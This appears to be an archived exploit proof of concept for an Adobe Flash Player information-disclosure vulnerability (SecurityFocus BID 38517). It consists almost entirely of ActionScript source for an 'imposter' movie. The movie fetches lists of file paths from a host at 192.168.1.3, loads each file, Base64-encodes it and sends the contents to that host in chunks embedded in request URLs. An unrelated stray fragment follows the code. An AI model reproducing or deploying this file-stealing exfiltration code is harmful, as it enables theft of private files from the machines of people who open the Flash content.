source: https://www.securityfocus.com/bid/38517/info Adobe Flash Player is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. package com.lavakumar.imposter{ import com.dynamicflash.util.Base64; import flash.display.MovieClip; import flash.display.Stage; import flash.text.TextField; import flash.events.Event; import flash.events.DataEvent; import flash.events.IOErrorEvent; import flash.events.ProgressEvent; import flash.events.SecurityErrorEvent; import flash.events.HTTPStatusEvent; import flash.utils.ByteArray; import flash.net.URLLoader; import flash.net.URLRequest; import flash.net.URLLoaderDataFormat; public class Main extends MovieClip { var filecontent:String=""; var read:int=0; var inputcount:int=0; var filecounter:int=0; var files:Array; var statuscode:int=1; public function Main() { addEventListener(Event.ENTER_FRAME, check, false, 0, true); } public function check(e:Event):void { if (statuscode==1) { get(); } else if (statuscode==2) { load(); } else if (statuscode==3) { send(); } } public function get():void { var getter:URLLoader = new URLLoader(); getter.dataFormat=URLLoaderDataFormat.BINARY; getter.addEventListener(Event.COMPLETE, get_FileLoaded); getter.addEventListener(IOErrorEvent.IO_ERROR, get_FileIoError); getter.addEventListener(Event.OPEN, get_FileOpened); getter.addEventListener(ProgressEvent.PROGRESS, get_FileProgress); getter.addEventListener(SecurityErrorEvent.SECURITY_ERROR, get_FileSecurityError); getter.addEventListener(HTTPStatusEvent.HTTP_STATUS, get_FileStatus); getter.addEventListener(DataEvent.DATA, get_DataEventHandler); var inputfile:URLRequest=new URLRequest("//192.168.1.3/imp/imposter"+inputcount.toString()+".input"); statuscode=0; getter.load(inputfile); } public function load():void { var loader:URLLoader = new URLLoader(); loader.dataFormat=URLLoaderDataFormat.BINARY; loader.addEventListener(Event.COMPLETE, load_FileLoaded); loader.addEventListener(IOErrorEvent.IO_ERROR, load_FileIoError); loader.addEventListener(Event.OPEN, load_FileOpened); loader.addEventListener(ProgressEvent.PROGRESS, load_FileProgress); loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR, load_FileSecurityError); loader.addEventListener(HTTPStatusEvent.HTTP_STATUS, load_FileStatus); loader.addEventListener(DataEvent.DATA, load_DataEventHandler); if (filecounter<files.length) { var filename:String=files[filecounter]; filecounter++; var file:URLRequest=new URLRequest(filename); statuscode=0; loader.load(file); } else { statuscode=1; } } public function send():void { if (read<filecontent.length) { var temp:String; var sendurl:String=""; if ((filecontent.length - read) < 200) { temp=filecontent.substr(read); var regex:RegExp=/\//g; temp=temp.replace(regex,"-"); sendurl="//192.168.1.3/imp/is_"+filecounter+"_"+read+"_"+filecontent.length+"_"+temp; read=filecontent.length; } else { temp=filecontent.substr(read,200); var regex:RegExp=/\//g; temp=temp.replace(regex,"-"); sendurl="//192.168.1.3/imp/is_"+filecounter+"_"+read+"_"+filecontent.length+"_"+temp; read=read+200; } var senddata:URLRequest=new URLRequest(sendurl); var sender:URLLoader = new URLLoader(); sender.dataFormat=URLLoaderDataFormat.BINARY; sender.addEventListener(Event.COMPLETE, send_FileLoaded); sender.addEventListener(IOErrorEvent.IO_ERROR, send_FileIoError); sender.addEventListener(Event.OPEN, send_FileOpened); sender.addEventListener(ProgressEvent.PROGRESS, send_FileProgress); sender.addEventListener(SecurityErrorEvent.SECURITY_ERROR, send_FileSecurityError); sender.addEventListener(HTTPStatusEvent.HTTP_STATUS, send_FileStatus); sender.addEventListener(DataEvent.DATA, send_DataEventHandler); sender.load(senddata); } else { read=0; statuscode=2; } } function load_FileLoaded(event:Event):void { var loader:URLLoader=event.target as URLLoader; var data:ByteArray=loader.data as ByteArray; filecontent=Base64.encodeByteArray(data); data=null; statuscode=3; } function load_FileOpened(event:Event):void { var loader:URLLoader=event.target as URLLoader; } function load_DataEventHandler(event:Event):void { } function load_FileProgress(event:flash.events.ProgressEvent):void { } function load_FileSecurityError(event:Event):void { statuscode=2; } function load_FileIoError(event:Event):void { statuscode=2; } function load_FileStatus(event:HTTPStatusEvent):void { } function load_FileNotFound(event:IOErrorEvent):void { statuscode=2; } function get_FileLoaded(event:Event):void { var getter:URLLoader=event.target as URLLoader; var data:String=event.target.data; if (data.length>0) { files=data.split(','); if (files.length>0) { statuscode=2; inputcount++; } else { statuscode=1; } } else { statuscode=1; } } function get_FileOpened(event:Event):void { } function get_DataEventHandler(event:Event):void { } function get_FileProgress(event:flash.events.ProgressEvent):void { } function get_FileSecurityError(event:Event):void { statuscode=1; } function get_FileIoError(event:Event):void { statuscode=1; } function get_FileStatus(event:HTTPStatusEvent):void { } function get_FileNotFound(event:IOErrorEvent):void { statuscode=1; } function send_FileLoaded(event:Event):void { } function send_FileOpened(event:Event):void { } function send_DataEventHandler(event:Event):void { } function send_FileProgress(event:flash.events.ProgressEvent):void { } function send_FileSecurityError(event:Event):void { } function send_FileIoError(event:Event):void { } function send_FileStatus(event:HTTPStatusEvent):void { } function send_FileNotFound(event:IOErrorEvent):void { } } }
体验盒子
